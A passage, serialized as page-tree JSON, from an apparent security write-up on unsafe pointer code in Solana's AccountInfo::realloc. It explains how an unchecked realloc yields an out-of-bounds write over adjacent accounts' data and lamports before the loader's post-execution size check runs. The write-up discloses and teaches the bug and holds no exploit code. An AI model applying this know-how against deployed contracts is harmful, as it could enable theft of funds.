18646,18651,18653,18664,18666,18671,18673,18678],{"type":26,"tag":130,"props":18633,"children":18635},{"className":18634},[],[18636],{"type":32,"value":16465},{"type":32,"value":18638}," gives us the ",{"type":26,"tag":130,"props":18640,"children":18642},{"className":18641},[],[18643],{"type":32,"value":18054},{"type":32,"value":18645}," from the ",{"type":26,"tag":130,"props":18647,"children":18649},{"className":18648},[],[18650],{"type":32,"value":17929},{"type":32,"value":18652},", whose data is inside the serialized buffer and immediately after the size of the data inside the serialized buffer. And ",{"type":26,"tag":41,"props":18654,"children":18657},{"href":18655,"rel":18656},"https://doc.rust-lang.org/std/primitive.slice.html#method.as_mut_ptr",[45],[18658],{"type":26,"tag":130,"props":18659,"children":18661},{"className":18660},[],[18662],{"type":32,"value":18663},"slice::as_mut_ptr()",{"type":32,"value":18665}," gives us that data pointer directly. So, this code computes a pointer to that serialized size field (8 bytes - the size of a ",{"type":26,"tag":130,"props":18667,"children":18669},{"className":18668},[],[18670],{"type":32,"value":10627},{"type":32,"value":18672}," - behind the data buffer), and then writes ",{"type":26,"tag":130,"props":18674,"children":18676},{"className":18675},[],[18677],{"type":32,"value":16313},{"type":32,"value":18679}," to it.",{"type":26,"tag":35,"props":18681,"children":18682},{},[18683,18685,18697,18699,18705],{"type":32,"value":18684},"This is reasonable... ",{"type":26,"tag":762,"props":18686,"children":18687},{},[18688,18690,18695],{"type":32,"value":18689},"as long as the ",{"type":26,"tag":130,"props":18691,"children":18693},{"className":18692},[],[18694],{"type":32,"value":6303},{"type":32,"value":18696}," actually came from the serialized buffer",{"type":32,"value":18698},". We'll come back to this ",{"type":26,"tag":41,"props":18700,"children":18702},{"href":18701},"#Not-contracts",[18703],{"type":32,"value":18704},"later",{"type":32,"value":470},{"type":26,"tag":35,"props":18707,"children":18708},{},[18709,18711,18716],{"type":32,"value":18710},"At this point we've updated the serialized buffer, so at exit the runtime will understand that the size of the account's data buffer has changed. However, we haven't dealt with the Rust side yet. Slices have a length, and we haven't dealt with the ",{"type":26,"tag":130,"props":18712,"children":18714},{"className":18713},[],[18715],{"type":32,"value":18054},{"type":32,"value":18717}," slice that is our view into the data from the Rust world. So let's look at the next chunk:",{"type":26,"tag":5512,"props":18719,"children":18721},{"className":5552,"code":18720,"language":5551,"meta":7,"style":7},"// Then set the new length in the local slice\nlet ptr = &mut *(((self.data.as_ptr() as *const u64).offset(1) as u64) as *mut u64);\n*ptr = new_len as u64;\n",[18722],{"type":26,"tag":130,"props":18723,"children":18724},{"__ignoreMap":7},[18725,18733,18860],{"type":26,"tag":137,"props":18726,"children":18727},{"class":5559,"line":5560},[18728],{"type":26,"tag":137,"props":18729,"children":18730},{"style":5564},[18731],{"type":32,"value":18732},"// Then set the new length in the local slice\n",{"type":26,"tag":137,"props":18734,"children":18735},{"class":5559,"line":5412},[18736,18740,18744,18748,18752,18756,18760,18764,18768,18772,18776,18780,18784,18788,18792,18796,18800,18804,18808,18812,18816,18820,18824,18828,18832,18836,18840,18844,18848,18852,18856],{"type":26,"tag":137,"props":18737,"children":18738},{"style":5573},[18739],{"type":32,"value":14378},{"type":26,"tag":137,"props":18741,"children":18742},{"style":5584},[18743],{"type":32,"value":16448},{"type":26,"tag":137,"props":18745,"children":18746},{"style":5590},[18747],{"type":32,"value":5593},{"type":26,"tag":137,"props":18749,"children":18750},{"style":5590},[18751],{"type":32,"value":9725},{"type":26,"tag":137,"props":18753,"children":18754},{"style":5573},[18755],{"type":32,"value":6325},{"type":26,"tag":137,"props":18757,"children":18758},{"style":5590},[18759],{"type":32,"value":12406},{"type":26,"tag":137,"props":18761,"children":18762},{"style":5601},[18763],{"type":32,"value":16608},{"type":26,"tag":137,"props":18765,"children":18766},{"style":5573},[18767],{"type":32,"value":16304},{"type":26,"tag":137,"props":18769,"children":18770},{"style":5590},[18771],{"type":32,"value":470},{"type":26,"tag":137,"props":18773,"children":18774},{"style":5601},[18775],{"type":32,"value":6303},{"type":26,"tag":137,"props":18777,"children":18778},{"style":5590},[18779],{"type":32,"value":470},{"type":26,"tag":137,"props":18781,"children":18782},{"style":5682},[18783],{"type":32,"value":16629},{"type":26,"tag":137,"props":18785,"children":18786},{"style":5601},[18787],{"type":32,"value":16634},{"type":26,"tag":137,"props":18789,"children":18790},{"style":5573},[18791],{"type":32,"value":11428},{"type":26,"tag":137,"props":18793,"children":18794},{"style":5590},[18795],{"type":32,"value":12406},{"type":26,"tag":137,"props":18797,"children":18798},{"style":5573},[18799],{"type":32,"value":12244},{"type":26,"tag":137,"props":18801,"children":18802},{"style":6009},[18803],{"type":32,"value":8445},{"type":26,"tag":137,"props":18805,"children":18806},{"style":5601},[18807],{"type":32,"value":200},{"type":26,"tag":137,"props":18809,"children":18810},{"style":5590},[18811],{"type":32,"value":470},{"type":26,"tag":137,"props":18813,"children":18814},{"style":5682},[18815],{"type":32,"value":16492},{"type":26,"tag":137,"props":18817,"children":18818},{"style":5601},[18819],{"type":32,"value":165},{"type":26,"tag":137,"props":18821,"children":18822},{"style":5626},[18823],{"type":32,"value":878},{"type":26,"tag":137,"props":18825,"children":18826},{"style":5601},[18827],{"type":32,"value":5671},{"type":26,"tag":137,"props":18829,"children":18830},{"style":5573},[18831],{"type":32,"value":11428},{"type":26,"tag":137,"props":18833,"children":18834},{"style":6009},[18835],{"type":32,"value":8445},{"type":26,"tag":137,"props":18837,"children":18838},{"style":5601},[18839],{"type":32,"value":5671},{"type":26,"tag":137,"props":18841,"children":18842},{"style":5573},[18843],{"type":32,"value":11428},{"type":26,"tag":137,"props":18845,"children":18846},{"style":5590},[18847],{"type":32,"value":12406},{"type":26,"tag":137,"props":18849,"children":18850},{"style":5573},[18851],{"type":32,"value":6325},{"type":26,"tag":137,"props":18853,"children":18854},{"style":6009},[18855],{"type":32,"value":8445},{"type":26,"tag":137,"props":18857,"children":18858},{"style":5601},[18859],{"type":32,"value":6430},{"type":26,"tag":137,"props":18861,"children":18862},{"class":5559,"line":5417},[18863,18867,18871,18875,18879,18883,18887],{"type":26,"tag":137,"props":18864,"children":18865},{"style":5590},[18866],{"type":32,"value":7152},{"type":26,"tag":137,"props":18868,"children":18869},{"style":5584},[18870],{"type":32,"value":16540},{"type":26,"tag":137,"props":18872,"children":18873},{"style":5590},[18874],{"type":32,"value":5593},{"type":26,"tag":137,"props":18876,"children":18877},{"style":5584},[18878],{"type":32,"value":16549},{"type":26,"tag":137,"props":18880,"children":18881},{"style":5573},[18882],{"type":32,"value":11414},{"type":26,"tag":137,"props":18884,"children":18885},{"style":6009},[18886],{"type":32,"value":8445},{"type":26,"tag":137,"props":18888,"children":18889},{"style":5601},[18890],{"type":32,"value":5604},{"type":26,"tag":35,"props":18892,"children":18893},{},[18894,18896,18902,18904,18915,18917,18923,18925,18931,18933,18938,18940,18945,18947,18957,18958,18965,18966,18973,18980,18982,18988,18990,18996,18998,19003,19005,19010,19012,19018,19020,19025],{"type":32,"value":18895},"That ",{"type":26,"tag":130,"props":18897,"children":18899},{"className":18898},[],[18900],{"type":32,"value":18901},"as_ptr()",{"type":32,"value":18903}," call is ",{"type":26,"tag":41,"props":18905,"children":18908},{"href":18906,"rel":18907},"https://doc.rust-lang.org/std/cell/struct.RefCell.html#method.as_ptr",[45],[18909],{"type":26,"tag":130,"props":18910,"children":18912},{"className":18911},[],[18913],{"type":32,"value":18914},"RefCell::as_ptr()",{"type":32,"value":18916}," due to the ",{"type":26,"tag":130,"props":18918,"children":18920},{"className":18919},[],[18921],{"type":32,"value":18922},"Deref",{"type":32,"value":18924}," impl on ",{"type":26,"tag":130,"props":18926,"children":18928},{"className":18927},[],[18929],{"type":32,"value":18930},"Rc",{"type":32,"value":18932}," (remember also that ",{"type":26,"tag":130,"props":18934,"children":18936},{"className":18935},[],[18937],{"type":32,"value":18095},{"type":32,"value":18939}," itself doesn't behave like a reference, you need to actually ",{"type":26,"tag":762,"props":18941,"children":18942},{},[18943],{"type":32,"value":18944},"get",{"type":32,"value":18946}," one through ",{"type":26,"tag":41,"props":18948,"children":18951},{"href":18949,"rel":18950},"https://doc.rust-lang.org/std/cell/struct.RefCell.html#method.borrow",[45],[18952],{"type":26,"tag":130,"props":18953,"children":18955},{"className":18954},[],[18956],{"type":32,"value":11388},{"type":32,"value":1011},{"type":26,"tag":41,"props":18959,"children":18962},{"href":18960,"rel":18961},"https://doc.rust-lang.org/std/cell/struct.RefCell.html#method.borrow_mut",[45],[18963],{"type":32,"value":18964},"and",{"type":32,"value":1011},{"type":26,"tag":41,"props":18967,"children":18970},{"href":18968,"rel":18969},"https://doc.rust-lang.org/std/cell/struct.RefCell.html#method.try_borrow",[45],[18971],{"type":32,"value":18972},"frie",{"type":26,"tag":41,"props":18974,"children":18977},{"href":18975,"rel":18976},"https://doc.rust-lang.org/std/cell/struct.RefCell.html#method.try_borrow_mut",[45],[18978],{"type":32,"value":18979},"nds",{"type":32,"value":18981},"). So from ",{"type":26,"tag":130,"props":18983,"children":18985},{"className":18984},[],[18986],{"type":32,"value":18987},"RefCell::\u003C&mut [u8]>::as_mut()",{"type":32,"value":18989}," we get a ",{"type":26,"tag":130,"props":18991,"children":18993},{"className":18992},[],[18994],{"type":32,"value":18995},"*mut &mut [u8]",{"type":32,"value":18997}," - a ",{"type":26,"tag":762,"props":18999,"children":19000},{},[19001],{"type":32,"value":19002},"pointer",{"type":32,"value":19004}," to the ",{"type":26,"tag":762,"props":19006,"children":19007},{},[19008],{"type":32,"value":19009},"slice reference",{"type":32,"value":19011},". From here, we turn the pointer into a ",{"type":26,"tag":130,"props":19013,"children":19015},{"className":19014},[],[19016],{"type":32,"value":19017},"*const u64",{"type":32,"value":19019}," pointer and then offset by 1 ",{"type":26,"tag":130,"props":19021,"children":19023},{"className":19022},[],[19024],{"type":32,"value":10627},{"type":32,"value":19026}," (so 8 bytes). Finally, we switch the pointer back to being mutable, and write the new length to it.",{"type":26,"tag":35,"props":19028,"children":19029},{},[19030,19032,19037,19039,19044,19046,19051,19053,19058,19060,19066],{"type":32,"value":19031},"Now, if you're sitting here thinking that this is unnecessarily convoluted and confusing, you'd be right! But we'll get back to that ",{"type":26,"tag":41,"props":19033,"children":19035},{"href":19034},"#Towards-safer-unsafe",[19036],{"type":32,"value":18704},{"type":32,"value":19038}," too, I promise. In summary, we're writing the new length as a ",{"type":26,"tag":130,"props":19040,"children":19042},{"className":19041},[],[19043],{"type":32,"value":10627},{"type":32,"value":19045}," to the region starting 8 bytes from the start of the slice ",{"type":26,"tag":762,"props":19047,"children":19048},{},[19049],{"type":32,"value":19050},"reference",{"type":32,"value":19052}," (the ",{"type":26,"tag":130,"props":19054,"children":19056},{"className":19055},[],[19057],{"type":32,"value":18054},{"type":32,"value":19059},").So, what does ",{"type":26,"tag":130,"props":19061,"children":19063},{"className":19062},[],[19064],{"type":32,"value":19065},"&[T]",{"type":32,"value":19067}," look like in Rust?",{"type":26,"tag":35,"props":19069,"children":19070},{},[19071,19073,19080,19082,19095,19097,19103],{"type":32,"value":19072},"According to ",{"type":26,"tag":41,"props":19074,"children":19077},{"href":19075,"rel":19076},"https://doc.rust-lang.org/reference/type-layout.html#pointers-and-references-layout",[45],[19078],{"type":32,"value":19079},"the reference",{"type":32,"value":19081},", it's completely undefined - there are no guarantees made in the reference, and ",{"type":26,"tag":41,"props":19083,"children":19086},{"href":19084,"rel":19085},"https://doc.rust-lang.org/reference/type-layout.html",[45],[19087,19089,19093],{"type":32,"value":19088},"\"Type layout can be changed with each compilation. ",{"type":26,"tag":137,"props":19090,"children":19091},{},[19092],{"type":32,"value":12180},{"type":32,"value":19094}," we only document what is guaranteed today\"",{"type":32,"value":19096},". But it seems like those pesky language specs aren't stopping Solana developers. In current ",{"type":26,"tag":130,"props":19098,"children":19100},{"className":19099},[],[19101],{"type":32,"value":19102},"rustc",{"type":32,"value":19104},", the layout is a data pointer followed by the size; essentially the same as:",{"type":26,"tag":5512,"props":19106,"children":19109},{"className":19107,"code":19108,"language":4326,"meta":7,"style":7},"language-c shiki shiki-themes slack-dark","// C language\nstruct slice_ref {\n    void* ptr;\n    size_t len;\n};\n",[19110],{"type":26,"tag":130,"props":19111,"children":19112},{"__ignoreMap":7},[19113,19121,19133,19150,19163],{"type":26,"tag":137,"props":19114,"children":19115},{"class":5559,"line":5560},[19116],{"type":26,"tag":137,"props":19117,"children":19118},{"style":5564},[19119],{"type":32,"value":19120},"// C language\n",{"type":26,"tag":137,"props":19122,"children":19123},{"class":5559,"line":5412},[19124,19128],{"type":26,"tag":137,"props":19125,"children":19126},{"style":5573},[19127],{"type":32,"value":11990},{"type":26,"tag":137,"props":19129,"children":19130},{"style":5601},[19131],{"type":32,"value":19132}," slice_ref {\n",{"type":26,"tag":137,"props":19134,"children":19135},{"class":5559,"line":5417},[19136,19141,19145],{"type":26,"tag":137,"props":19137,"children":19138},{"style":5573},[19139],{"type":32,"value":19140},"    void",{"type":26,"tag":137,"props":19142,"children":19143},{"style":5590},[19144],{"type":32,"value":7152},{"type":26,"tag":137,"props":19146,"children":19147},{"style":5601},[19148],{"type":32,"value":19149}," ptr;\n",{"type":26,"tag":137,"props":19151,"children":19152},{"class":5559,"line":5642},[19153,19158],{"type":26,"tag":137,"props":19154,"children":19155},{"style":5573},[19156],{"type":32,"value":19157},"    size_t",{"type":26,"tag":137,"props":19159,"children":19160},{"style":5601},[19161],{"type":32,"value":19162}," len;\n",{"type":26,"tag":137,"props":19164,"children":19165},{"class":5559,"line":5745},[19166],{"type":26,"tag":137,"props":19167,"children":19168},{"style":5601},[19169],{"type":32,"value":19170},"};\n",{"type":26,"tag":35,"props":19172,"children":19173},{},[19174],{"type":32,"value":19175},"So at the end of the day we find out that the code is simply writing over the length field in the slice reference. Let's step back a moment and take a look at all the assumptions we made along the way while executing these 2 lines (really only one of importance!):",{"type":26,"tag":4820,"props":19177,"children":19178},{},[19179,19184,19202],{"type":26,"tag":3430,"props":19180,"children":19181},{},[19182],{"type":32,"value":19183},"Slices are laid out in the precise manner described",{"type":26,"tag":3430,"props":19185,"children":19186},{},[19187,19189,19195,19197],{"type":32,"value":19188},"Pointers and ",{"type":26,"tag":130,"props":19190,"children":19192},{"className":19191},[],[19193],{"type":32,"value":19194},"usize",{"type":32,"value":19196}," are the same width as ",{"type":26,"tag":130,"props":19198,"children":19200},{"className":19199},[],[19201],{"type":32,"value":10627},{"type":26,"tag":3430,"props":19203,"children":19204},{},[19205,19207,19212],{"type":32,"value":19206},"The ",{"type":26,"tag":130,"props":19208,"children":19210},{"className":19209},[],[19211],{"type":32,"value":18095},{"type":32,"value":19213}," was not borrowed (i.e. we didn't just mutate it while someone else has a reference to its contents)",{"type":26,"tag":35,"props":19215,"children":19216},{},[19217,19219,19224,19226,19232,19234,19239,19241,19247,19249,19254,19256,19266],{"type":32,"value":19218},"Assumption #2 is ",{"type":26,"tag":762,"props":19220,"children":19221},{},[19222],{"type":32,"value":19223},"probably",{"type":32,"value":19225}," fine when we only care about targeting Solana's bytecode machine, but still not a particularly safe assumption to make in case some change happens on the toolchain. And assumption #3 turns out to be a non-issue since we had just done a ",{"type":26,"tag":130,"props":19227,"children":19229},{"className":19228},[],[19230],{"type":32,"value":19231},"borrow_mut",{"type":32,"value":19233}," of the ",{"type":26,"tag":130,"props":19235,"children":19237},{"className":19236},[],[19238],{"type":32,"value":18095},{"type":32,"value":19240}," (through ",{"type":26,"tag":130,"props":19242,"children":19244},{"className":19243},[],[19245],{"type":32,"value":19246},"AccountInfo::try_borrow_mut_data()",{"type":32,"value":19248},"), and ",{"type":26,"tag":130,"props":19250,"children":19252},{"className":19251},[],[19253],{"type":32,"value":18095},{"type":32,"value":19255}," is not usable between multiple threads",{"type":26,"tag":18065,"props":19257,"children":19258},{},[19259],{"type":26,"tag":41,"props":19260,"children":19264},{"href":19261,"ariaDescribedBy":19262,"dataFootnoteRef":7,"id":19263},"#user-content-fn-sendsync",[18072],"user-content-fnref-sendsync",[19265],{"type":32,"value":277},{"type":32,"value":19267},", so we already have exclusive access.",{"type":26,"tag":35,"props":19269,"children":19270},{},[19271,19273,19277],{"type":32,"value":19272},"A few more ",{"type":26,"tag":762,"props":19274,"children":19275},{},[19276],{"type":32,"value":9691},{"type":32,"value":19278}," things of note, that could have gone badly but didn't:",{"type":26,"tag":3426,"props":19280,"children":19281},{},[19282,19324],{"type":26,"tag":3430,"props":19283,"children":19284},{},[19285,19287,19293,19295,19300,19302,19307,19309,19314,19316,19322],{"type":32,"value":19286},"By reborrowing the pointer (the ",{"type":26,"tag":130,"props":19288,"children":19290},{"className":19289},[],[19291],{"type":32,"value":19292},"&mut *(\u003Cvalue of type *mut u64>)",{"type":32,"value":19294},"), we've created a reference with an ",{"type":26,"tag":762,"props":19296,"children":19297},{},[19298],{"type":32,"value":19299},"unbounded lifetime",{"type":32,"value":19301},". Rust is free to infer ",{"type":26,"tag":762,"props":19303,"children":19304},{},[19305],{"type":32,"value":19306},"any",{"type":32,"value":19308}," lifetime for ",{"type":26,"tag":130,"props":19310,"children":19312},{"className":19311},[],[19313],{"type":32,"value":16540},{"type":32,"value":19315}," (including ",{"type":26,"tag":130,"props":19317,"children":19319},{"className":19318},[],[19320],{"type":32,"value":19321},"'static",{"type":32,"value":19323},"); thankfully it's only used in the next statement and never has a chance to escape.",{"type":26,"tag":3430,"props":19325,"children":19326},{},[19327,19329,19335,19337,19342,19344,19349,19351,19356,19358,19363,19365,19370,19372,19377,19379,19385,19387,19392,19394,19399,19401,19406,19408,19413,19415,19420],{"type":32,"value":19328},"Going back to the first statement when we were modifying the data buffer, it turns out we have another lifetime problem: we created a mutable pointer to the data from the ",{"type":26,"tag":130,"props":19330,"children":19332},{"className":19331},[],[19333],{"type":32,"value":19334},"RefMut",{"type":32,"value":19336}," returned from ",{"type":26,"tag":130,"props":19338,"children":19340},{"className":19339},[],[19341],{"type":32,"value":16465},{"type":32,"value":19343},", but the ",{"type":26,"tag":130,"props":19345,"children":19347},{"className":19346},[],[19348],{"type":32,"value":19334},{"type":32,"value":19350}," is dropped at the end of the statement. So, we now have in ",{"type":26,"tag":130,"props":19352,"children":19354},{"className":19353},[],[19355],{"type":32,"value":16540},{"type":32,"value":19357}," a ",{"type":26,"tag":762,"props":19359,"children":19360},{},[19361],{"type":32,"value":19362},"mutable",{"type":32,"value":19364}," pointer to the ",{"type":26,"tag":130,"props":19366,"children":19368},{"className":19367},[],[19369],{"type":32,"value":18095},{"type":32,"value":19371},"'s data, but the ",{"type":26,"tag":130,"props":19373,"children":19375},{"className":19374},[],[19376],{"type":32,"value":18095},{"type":32,"value":19378}," thinks that we're done with our borrow. If we happened to be in a multithreaded scenario with something like a ",{"type":26,"tag":130,"props":19380,"children":19382},{"className":19381},[],[19383],{"type":32,"value":19384},"Mutex",{"type":32,"value":19386}," instead of a ",{"type":26,"tag":130,"props":19388,"children":19390},{"className":19389},[],[19391],{"type":32,"value":18095},{"type":32,"value":19393}," (but with otherwise semantically identical code), then a different thread could attempt to borrow between creating ",{"type":26,"tag":130,"props":19395,"children":19397},{"className":19396},[],[19398],{"type":32,"value":16540},{"type":32,"value":19400}," and writing to it ",{"type":26,"tag":762,"props":19402,"children":19403},{},[19404],{"type":32,"value":19405},"and succeed",{"type":32,"value":19407},", resulting in us writing while another reference is alive. However, since ",{"type":26,"tag":130,"props":19409,"children":19411},{"className":19410},[],[19412],{"type":32,"value":16540},{"type":32,"value":19414}," is behind the actual data and thus the region it points to is inaccessible through the ",{"type":26,"tag":130,"props":19416,"children":19418},{"className":19417},[],[19419],{"type":32,"value":6303},{"type":32,"value":19421}," slice, this is still not a problem. I just wanted to highlight how easy it is to mess up borrowing and lifetimes when writing unsafe code.",{"type":26,"tag":35,"props":19423,"children":19424},{},[19425,19427,19432],{"type":32,"value":19426},"Ok, now that we've understood what the code is ",{"type":26,"tag":762,"props":19428,"children":19429},{},[19430],{"type":32,"value":19431},"trying",{"type":32,"value":19433}," to do, let's try to break it, shall we?",{"type":26,"tag":92,"props":19435,"children":19437},{"id":19436},"what-can-go-wrong",[19438],{"type":32,"value":19439},"What can go wrong?",{"type":26,"tag":118,"props":19441,"children":19443},{"id":19442},"contracts",[19444],{"type":32,"value":19445},"Contracts",{"type":26,"tag":35,"props":19447,"children":19448},{},[19449,19451,19456,19458,19463,19465,19470,19472,19477],{"type":32,"value":19450},"Again, it's quite conspicuous that there's no bounds check whatsoever, and additionally, we notice that at no point did we actually touch the data pointer of the slice reference when ",{"type":26,"tag":130,"props":19452,"children":19454},{"className":19453},[],[19455],{"type":32,"value":16229},{"type":32,"value":19457},"'ing. In other words, when we realloc, all we do is change some size fields, no allocation is happening. So, if we ",{"type":26,"tag":130,"props":19459,"children":19461},{"className":19460},[],[19462],{"type":32,"value":16229},{"type":32,"value":19464}," to some large size, past the end of the buffer of roughly ",{"type":26,"tag":130,"props":19466,"children":19468},{"className":19467},[],[19469],{"type":32,"value":17885},{"type":32,"value":19471}," bytes in the serialized buffer from the BPF loader, then we've got free out-of-bounds memory write! Using the ",{"type":26,"tag":130,"props":19473,"children":19475},{"className":19474},[],[19476],{"type":32,"value":6303},{"type":32,"value":19478}," slice, we can write to anything \"after\" our account's data in memory. Other accounts' data are stored adjacent in memory, so it'd be pretty easy to modify the data or lamports. And remember, sizes and indices are unsigned, so what's \"behind\" our account in memory is actually just very far \"after\" our account - the address will wrap around the end of the address space.",{"type":26,"tag":35,"props":19480,"children":19481},{},[19482,19484,19491],{"type":32,"value":19483},"There is ",{"type":26,"tag":41,"props":19485,"children":19488},{"href":19486,"rel":19487},"https://github.com/solana-labs/solana/blob/94685e1222b3289859a447d62fadea20898241e0/programs/bpf_loader/src/serialization.rs#L324-L328",[45],[19489],{"type":32,"value":19490},"a check",{"type":32,"value":19492}," by the BPF loader, however, and it boils down to:",{"type":26,"tag":5512,"props":19494,"children":19496},{"className":5552,"code":19495,"language":5551,"meta":7,"style":7},"if post_len.saturating_sub(*pre_len) > MAX_PERMITTED_DATA_INCREASE\n    || post_len > MAX_PERMITTED_DATA_LENGTH as usize\n{\n    return Err(InstructionError::InvalidRealloc);\n}\n",[19497],{"type":26,"tag":130,"props":19498,"children":19499},{"__ignoreMap":7},[19500,19538,19568,19575,19608],{"type":26,"tag":137,"props":19501,"children":19502},{"class":5559,"line":5560},[19503,19507,19512,19516,19520,19524,19528,19533],{"type":26,"tag":137,"props":19504,"children":19505},{"style":5610},[19506],{"type":32,"value":18171},{"type":26,"tag":137,"props":19508,"children":19509},{"style":5584},[19510],{"type":32,"value":19511}," post_len",{"type":26,"tag":137,"props":19513,"children":19514},{"style":5590},[19515],{"type":32,"value":470},{"type":26,"tag":137,"props":19517,"children":19518},{"style":5682},[19519],{"type":32,"value":16883},{"type":26,"tag":137,"props":19521,"children":19522},{"style":5601},[19523],{"type":32,"value":165},{"type":26,"tag":137,"props":19525,"children":19526},{"style":5590},[19527],{"type":32,"value":7152},{"type":26,"tag":137,"props":19529,"children":19530},{"style":5584},[19531],{"type":32,"value":19532},"pre_len",{"type":26,"tag":137,"props":19534,"children":19535},{"style":5601},[19536],{"type":32,"value":19537},") > MAX_PERMITTED_DATA_INCREASE\n",{"type":26,"tag":137,"props":19539,"children":19540},{"class":5559,"line":5412},[19541,19546,19550,19554,19559,19563],{"type":26,"tag":137,"props":19542,"children":19543},{"style":5590},[19544],{"type":32,"value":19545},"    ||",{"type":26,"tag":137,"props":19547,"children":19548},{"style":5584},[19549],{"type":32,"value":19511},{"type":26,"tag":137,"props":19551,"children":19552},{"style":5590},[19553],{"type":32,"value":16785},{"type":26,"tag":137,"props":19555,"children":19556},{"style":5601},[19557],{"type":32,"value":19558}," MAX_PERMITTED_DATA_LENGTH ",{"type":26,"tag":137,"props":19560,"children":19561},{"style":5573},[19562],{"type":32,"value":11428},{"type":26,"tag":137,"props":19564,"children":19565},{"style":6009},[19566],{"type":32,"value":19567}," usize\n",{"type":26,"tag":137,"props":19569,"children":19570},{"class":5559,"line":5417},[19571],{"type":26,"tag":137,"props":19572,"children":19573},{"style":5601},[19574],{"type":32,"value":13471},{"type":26,"tag":137,"props":19576,"children":19577},{"class":5559,"line":5642},[19578,19583,19587,19591,19595,19599,19604],{"type":26,"tag":137,"props":19579,"children":19580},{"style":5610},[19581],{"type":32,"value":19582},"    return",{"type":26,"tag":137,"props":19584,"children":19585},{"style":6009},[19586],{"type":32,"value":18341},{"type":26,"tag":137,"props":19588,"children":19589},{"style":5601},[19590],{"type":32,"value":165},{"type":26,"tag":137,"props":19592,"children":19593},{"style":6009},[19594],{"type":32,"value":18350},{"type":26,"tag":137,"props":19596,"children":19597},{"style":5590},[19598],{"type":32,"value":6072},{"type":26,"tag":137,"props":19600,"children":19601},{"style":6009},[19602],{"type":32,"value":19603},"InvalidRealloc",{"type":26,"tag":137,"props":19605,"children":19606},{"style":5601},[19607],{"type":32,"value":6430},{"type":26,"tag":137,"props":19609,"children":19610},{"class":5559,"line":5745},[19611],{"type":26,"tag":137,"props":19612,"children":19613},{"style":5601},[19614],{"type":32,"value":6507},{"type":26,"tag":35,"props":19616,"children":19617},{},[19618,19620,19625,19627,19632],{"type":32,"value":19619},"But, like the other checks performed by the loader, this check only runs after the contract ",{"type":26,"tag":762,"props":19621,"children":19622},{},[19623],{"type":32,"value":19624},"finishes",{"type":32,"value":19626}," execution. ",{"type":26,"tag":762,"props":19628,"children":19629},{},[19630],{"type":32,"value":19631},"During",{"type":32,"value":19633}," execution, the contract is free to make whatever modifications to memory that it wants, since Solana's eBPF machine doesn't hook memory accesses in any way.",{"type":26,"tag":35,"props":19635,"children":19636},{},[19637,19639,19644,19646,19651,19653,19660],{"type":32,"value":19638},"The end result is that in order to successfully exploit this bug, an attacker needs a way to change the length back to something valid before the program exits. However, with potentially ",{"type":26,"tag":762,"props":19640,"children":19641},{},[19642],{"type":32,"value":19643},"arbitrary",{"type":32,"value":19645}," memory access through a mistakenly-",{"type":26,"tag":130,"props":19647,"children":19649},{"className":19648},[],[19650],{"type":32,"value":16229},{"type":32,"value":19652},"'d account, this falls in the relm of some ",{"type":26,"tag":41,"props":19654,"children":19657},{"href":19655,"rel":19656},"https://en.wikipedia.org/wiki/Buffer_overflow",[45],[19658],{"type":32,"value":19659},"old-school pwning",{"type":32,"value":19661}," - even if we can't use the out-of-bounds access directly, there's plenty of pointers in memory that could be of use.",{"type":26,"tag":118,"props":19663,"children":19665},{"id":19664},"not-contracts",[19666],{"type":32,"value":19667},"Not-contracts?",{"type":26,"tag":35,"props":19669,"children":19670},{},[19671,19673,19678,19680,19690,19692,19704,19706,19713,19715,19720,19722,19727,19729,19742,19744,19749,19751,19756],{"type":32,"value":19672},"Remember when we said that all this code makes sense ",{"type":26,"tag":762,"props":19674,"children":19675},{},[19676],{"type":32,"value":19677},"if the data points to the BPF loader's serialized buffer",{"type":32,"value":19679},"? Well unfortunately for us, there's nothing enforcing that; all the fields on ",{"type":26,"tag":41,"props":19681,"children":19684},{"href":19682,"rel":19683},"https://docs.rs/solana-program/1.10.28/solana_program/account_info/struct.AccountInfo.html",[45],[19685],{"type":26,"tag":130,"props":19686,"children":19688},{"className":19687},[],[19689],{"type":32,"value":17530},{"type":32,"value":19691}," are public, and so is its ",{"type":26,"tag":41,"props":19693,"children":19696},{"href":19694,"rel":19695},"https://docs.rs/solana-program/1.10.28/solana_program/account_info/struct.AccountInfo.html#method.new",[45],[19697,19702],{"type":26,"tag":130,"props":19698,"children":19700},{"className":19699},[],[19701],{"type":32,"value":17714},{"type":32,"value":19703}," method",{"type":32,"value":19705}," (which is ",{"type":26,"tag":41,"props":19707,"children":19710},{"href":19708,"rel":19709},"https://docs.rs/solana-program/1.10.28/src/solana_program/account_info.rs.html#160-180",[45],[19711],{"type":32,"value":19712},"nothing more than a thin wrapper around just creating the struct literal yourself",{"type":32,"value":19714},"). The ",{"type":26,"tag":130,"props":19716,"children":19718},{"className":19717},[],[19719],{"type":32,"value":16229},{"type":32,"value":19721}," code critically assumes that the memory 8 bytes behind the data buffer is the data's length and that we can write to it however we want when realloc'ing. So, clearly if we were to create an ",{"type":26,"tag":130,"props":19723,"children":19725},{"className":19724},[],[19726],{"type":32,"value":17530},{"type":32,"value":19728}," ourselves - potentially through the ",{"type":26,"tag":41,"props":19730,"children":19733},{"href":19731,"rel":19732},"https://docs.rs/solana-program/1.10.28/solana_program/account_info/trait.Account.html",[45],[19734,19740],{"type":26,"tag":130,"props":19735,"children":19737},{"className":19736},[],[19738],{"type":32,"value":19739},"Account",{"type":32,"value":19741}," trait",{"type":32,"value":19743},", which is hardly documented at all and makes ",{"type":26,"tag":762,"props":19745,"children":19746},{},[19747],{"type":32,"value":19748},"no",{"type":32,"value":19750}," mention of any prerequisites about the nature of the references that need to be returned - we'd run in to problems from pretty much any practical way we'd allocate the ",{"type":26,"tag":130,"props":19752,"children":19754},{"className":19753},[],[19755],{"type":32,"value":6303},{"type":32,"value":19757}," buffer.",{"type":26,"tag":35,"props":19759,"children":19760},{},[19761,19763,19774,19776,19782,19784,19790,19792,19805,19807,19812,19814,19819,19821,19826,19828,19833,19835,19840,19842,19847],{"type":32,"value":19762},"One long arm of this is ",{"type":26,"tag":41,"props":19764,"children":19767},{"href":19765,"rel":19766},"https://docs.rs/solana-sdk/1.10.28/solana_sdk/account/struct.Account.html",[45],[19768],{"type":26,"tag":130,"props":19769,"children":19771},{"className":19770},[],[19772],{"type":32,"value":19773},"solana_sdk::account::Account",{"type":32,"value":19775}," - in the client SDK. It holds an account's data in a ",{"type":26,"tag":130,"props":19777,"children":19779},{"className":19778},[],[19780],{"type":32,"value":19781},"Vec\u003Cu8>",{"type":32,"value":19783},", and it implements 